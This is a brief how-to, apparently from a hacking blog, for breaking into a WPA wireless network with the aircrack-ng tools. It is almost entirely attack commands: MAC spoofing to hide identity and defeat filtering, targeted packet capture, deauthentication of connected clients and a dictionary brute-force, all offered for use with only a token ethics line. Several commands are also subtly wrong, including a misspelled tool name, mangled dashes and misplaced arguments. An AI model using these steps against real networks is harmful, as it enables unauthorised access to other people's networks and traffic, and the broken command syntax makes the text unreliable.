Please be ethical with knowledge
Cracking Wireless is fun. Its like a slap in the face to everyone who thinks wireless is safe. Hiding your SSID, MAC Filtering, and other tweaks will not keep you safe.
# ifconfig –a
find your WLAN if
# airman-ng stop <Wireless if>
# ifconfig <Wireless if> down
# macchanger mac <mac to use in the xx:xx:xx:xx:xx:xx form>
We change our MAC to hide our identity and if we want to bypass MAC filtering
# airodump-ng <wireless if>
This will discover APs in the area. Its a really neat powerful tool, play with it a little.
# airodump-ng –channel <channel> –w <file> –bssid <ssid in the form of XX:XX:XX:XX:XX:XX> <wireless if>
This will capture packets to a file you specify for a specific ssid on a specific channel
In a new shell…
aireplay-ng –0 10 –a <AP MAC> –c <AP MAC> <wireless if>
Wait for the ACK packets. This will only work if there are active hosts on the AP.
Now crack the dump with a brute force attack
aircrack-ng <file> –w <dict file>
If you need a dict file there is an existing one in /pentest/wireless/cowpatty/dict